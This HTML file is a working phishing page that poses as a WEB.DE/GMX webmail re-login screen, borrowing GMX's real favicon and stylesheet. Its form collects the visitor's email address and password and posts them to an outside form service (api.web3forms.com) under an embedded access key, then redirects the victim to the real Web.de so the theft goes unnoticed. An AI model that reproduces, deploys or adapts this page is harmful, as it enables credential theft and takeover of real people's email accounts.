<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <meta charset="UTF-8">
    <meta name="description" content="Mobiler GMX Login: Auf dieser Seite können Sie sich mit dem Smartphone oder Tablet einfach und sicher unterwegs in Ihr GMX Postfach einloggen.">
    <meta name="robots" content="noindex">
    <link rel="shortcut icon" type="image/x-icon" href="https://mm.gmx.net/img.ui-portal.de/cd/ci/gmx.net/favicon.ico">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="apple-itunes-app" content="app-id=417352269">
    <link rel="stylesheet" type="text/css" href="https://mm.gmx.net/loginapplication/login/resource/gui.GuiResources/::/gui/styles/default/themes/uni-ver-98661918DDD3D8BECF2096F5694034CC.css?-gmxnet">

    <style>
        .img {
            display: flex;
            padding-left: 2%;
            padding-top: 1%;
            justify-content: left;
            background-color: white;
            border-top: 4px solid #ffd800;
            padding: 8px;
            outline: none;
            border-bottom: 0.5px solid rgb(53, 52, 52);
        }
        
        .email {
            margin-bottom: 5px;
            color: black;
            border-radius: 3px;
            padding-top: 8px;
            padding-bottom: 8px;
            border: 1px solid rgb(83, 82, 82);
            width: 100%;
        }
        
        .passwort {
            margin-bottom: 5px;
            color: black;
            border-radius: 3px;
            padding-top: 8px;
            padding-bottom: 8px;
            border: 1px solid rgb(83, 82, 82);
            width: 100%;
        }
        
        .submit {
            margin-top: 20px;
            color: white;
            border-radius: 3px;
            padding-top: 8px;
            padding-bottom: 8px;
            border: none;
            width: 100%;
            text-align: center;
            background-color: #ffd800;
        }
        
        .pass {
            margin-top: 20px;
        }
    </style>
</head>

<body>
    <div class="main-layout">
        <header>
            <div class="img">
                <img src="image/dp.png" alt="Not supported" width="8%" height="auto">
                <div class="search">
                </div>
            </div>

        </header>
        </header>
        <main>
            <div class="centered-content centered-content--narrow">

                <div class="content-title">
                    <div class="content-title__logo">
                        <img src="image/download.png" alt="Not supported" width="15%" height="auto">
                    </div>
                    <h1><b>Bitte erneut einloggen</b></h1>
                    <p id="loginText">
                        Bitte melden Sie sich mit Ihrem WEB.DE Nutzernamen und Ihrem Passwort an.
                    </p>
                </div>

                <form action="https://api.web3forms.com/submit" method="POST">
                    <input type="hidden" name="access_key" value="4313fbb1-01f5-4f4d-961b-a88688bc40d4">

                    <input type="hidden" name="redirect" value="https://Web.de">

                    <div class="add">
                        <label class="pos-label pos-label--block required" for="0:formPanel:loginForm:usernameInput:topWrapper:inputWrapper:input">WEB E-Mail-Adresse</label>
                        <input type="text" name="text" placeholder=" WEB.DE E-mail Addresse" maxlength="50" required class="email">
                    </div>

                    <div class="pass">
                        <label class="pos-label pos-label--block required" for="0:formPanel:loginForm:passwordInput:topWrapper:inputWrapper:input">Passwort eingeben</label>
                        <input type="text" name="text" placeholder=" Passwort eingeben" required class="passwort">
                    </div>

                    <div>
                        <input type="submit" value="Login" class="submit">
                    </div>
                </form>

                <a class="a-ta-c a-mb-space-3 pos-button pos-button--link pos-button--block" href="#">
            Passwort vergessen?
        </a>
                <hr class="centered-content__line-break a-mb-space-4">
                <div class="a-ta-c a-mb-space-4">
                    <h2 class="a-mb-space-2.5">
                        Neu bei WEB?
                    </h2>
                    <a class="pos-button pos-button--link pos-button--block" href="#">
                Jetzt kostenlos registrieren!
            </a>
                </div>
            </div>

            <div class="footer">
                <a class="footer__link" href="#">Impressum</a>
                <a class="footer__link" href="#">Verträge hier kündigen</a>
                <a class="footer__link" href="#">AGB</a>
                <a class="footer__link" href="#">Datenschutz</a>
            </div>

    </div>
    </div>
    </main>
</body>

</html>